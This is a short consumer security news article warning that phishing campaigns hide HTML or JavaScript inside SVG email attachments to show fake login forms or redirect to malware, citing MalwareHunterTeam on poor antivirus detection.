Before talking about scams, a quick refresher course on SVG, or Scalable Vector Graphics, files is in order. Unlike classic images like JPG or PNG, which look like a mosaic of pixels, SVGs work differently. They use lines, shapes, and text described by mathematical formulas in their code.
Images like no other
The result? A sharp, precise image that can be enlarged or reduced infinitely without losing quality. This is what makes SVGs very popular for logos or online graphics. But this technical flexibility has also attracted the attention of hackers.
Hackers have discovered a great passion for SVG files in their phishing campaigns, according to security researchers at MalwareHunterTeam. Their goal is simple: to bypass security tools that scan attachments for threats. However, an SVG file looks more like a harmless piece of text than a real image, making it difficult to identify as malicious.
How does it work? Some SVGs embed HTML or JavaScript code, in addition to graphical instructions. This allows hackers to turn these files into interactive tools that can display fraudulent forms or automatically redirect your browser to malicious sites.
Let’s take a concrete example. You receive an email with an SVG file attached, presented as an important document. Once opened, a fake Excel table appears on the screen, asking you to enter your credentials. What you don’t see is that this information is immediately transmitted to hackers. In other cases, the file may contain a link that downloads malware to your device.
And the worst part is that security software struggles to spot these attacks. According to samples shared by MalwareHunterTeam, some malicious SVG files go completely unnoticed or are barely detected by one or two out of dozens of antivirus solutions.
SVG files in an email? Absolute distrust! Unless you’re a developer and are expecting exactly this type of attachment, it’s best to avoid them like the plague. Caution remains in order: immediately delete any suspicious message containing an SVG file. While their ingenuity almost deserves to be applauded, let’s not forget that these attacks aim above all to steal your data or infect your devices. So, the next time a pretty picture seems too good to be true, think twice before clicking…
Source: www.journaldugeek.com
